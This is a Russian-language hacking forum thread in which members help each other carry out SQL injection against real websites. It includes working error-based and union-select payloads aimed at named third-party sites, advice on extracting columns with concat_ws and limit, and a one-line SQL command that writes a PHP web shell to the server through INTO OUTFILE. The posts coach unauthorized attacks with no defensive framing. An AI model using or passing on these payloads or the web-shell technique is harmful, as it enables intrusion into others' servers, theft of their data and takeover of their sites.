Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    чем похоже?
     
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Немогу скулю разкрутить, хелп

     
  3. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    тут пробуй
     
  4. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    так просто пишут Вы неправильно ввели Email или пароль.
     
  5. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    SELECT * FROM menu_items WHERE link = '1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and''. Duplicate column name '5.5.8'
     
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    чёт я не вдуплю куда етот запрос впихнуть
     
  7. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Тогда читай мануалы
     
  8. m00c0w

    m00c0w Banned

    Joined:
    25 Dec 2011
    Messages:
    104
    Likes Received:
    14
    Reputations:
    5

    вместо version() :) свой запрос


    lalala from table
     
  9. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    вопрос таков:
    если я имею рутовский доступ к БД, что я теоретически смогу сделать?
    Вплане заливки шелла, правки индекса...
    Например, через тулзу MySQL query browser
     
  10. bodrich

    bodrich Member

    Joined:
    9 Jan 2012
    Messages:
    21
    Likes Received:
    7
    Reputations:
    0
    А как вывести только одну колонку ? Пытаюсь вот таким запросом http://hostdb.ru/auth/login?myPassword=WCRTESTINPUT000001&type=1&myLogin=1'and(select*from(information_schema.tables))and' Но в ответ пишет:
     
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    полный доступ к базе MySQL, создание/уничтожение
    и читать/писать файлы (если есть достаточно прав у пользователя MySQL в системе)
     
    _________________________
  12. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    если разрешён коннект с удалённых ip для пользователя, то ты сможешь с неё подконнектится, иначе нет

    Подзапрос может возвращать только одно значение, тобишь нельзя использовать *, там же написано. Если надо вернуть несколько колонок сразу, то надо сначала их объединить оператором типа concat_ws(0x3a,column_1,column_2,...,column_n), где 0x3a = : в hex формате. А ещё предвижу ошибку subquery returned more than one row(ну или как-то так), это потому что надо использовать лимит в подзапросе.
     
    #19632 Melfis, 7 Mar 2012
    Last edited: 7 Mar 2012
  13. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Melfis
    ессесно я к ней и подключаюсь и все что хочешь могу делать.
    перефразирую:
    какие мне команды отправлять БД чтобы загрузить файл и вообще возможно ли это?
     
  14. m00c0w

    m00c0w Banned

    Joined:
    25 Dec 2011
    Messages:
    104
    Likes Received:
    14
    Reputations:
    5
    при наличии file_priv =Y

    SELECT '<?php system($_GET[c]);?>' INTO OUTFILE '/dir/name/shell.php'
     
    1 person likes this.
  15. d4rkn3ss

    d4rkn3ss New Member

    Joined:
    13 Jan 2012
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    why i can not see vul columns no??

    Code:
    http://www.myhomestory.com/interior-doors-gallery.php?id=-1%20UnioN%20selEct%20all%200,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1--
     
  16. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    becouse id=1+and+1=0

    http://www.myhomestory.com/interior-doors-gallery.php?id=1+and+1=0%20UnioN%20selEct%20all%200,version%28%29,2,3,4,5,6,7,8,9,0,1%20,2,3,4,5,6,7,8,9,0,1--

    this is forum Russian,translate write... уже наконец то
     
    _________________________
    2 people like this.
  17. d4rkn3ss

    d4rkn3ss New Member

    Joined:
    13 Jan 2012
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    эх жаль. Но как ты его нашел??
     
  18. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    чего нашел?, просто создал не верную логику

    или же так http://www.myhomestory.com/interior-doors-gallery.php?id=111111111111111111111%20UnioN%20selEct%20all%200,version%28%29,2,3,4,5,6,7,8,9,0,1%20,2,3,4,5,6,7,8,9,0,1--
     
    _________________________
  19. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Ты меня порвал :D Ты должен сделать так, чтобы инфа с БД не вывелась(1=0, 999999.9).
     
    1 person likes this.
  20. d4rkn3ss

    d4rkn3ss New Member

    Joined:
    13 Jan 2012
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Хорошо. . я получил его. . спасибо!

    Это параметр для SQL инъекций, это может быть POST SQL инъекции, я не совсем уверен.

    Код:



    Чтобы получить сообщение об ошибке я HackBar для Firefox, я ставлю в этой первой:

    Код:

    http://www.yaziyaz.net/Evrim/konular/54-inorganik-evrim.html


    Тогда я нажал на "Включить сообщения данных и поместить в параметр и я нажал на" Выполнить "и он дал мне следующее сообщение об ошибке (ы): Код: Warning: Неверный аргумент для Еогеасп поставки () в / home/yaziyaz2/public_html / Evrim / компоненты / com_content / модели / category.php на линии 337 Предупреждение: mysql_num_rows (): поставляется аргумент не является допустимым результатом MySQL ресурса / home/yaziyaz2/public_html/Evrim/libraries/joomla/database/database/mysql. PHP в строке 344 как вводить дальше??
     
Thread Status:
Not open for further replies.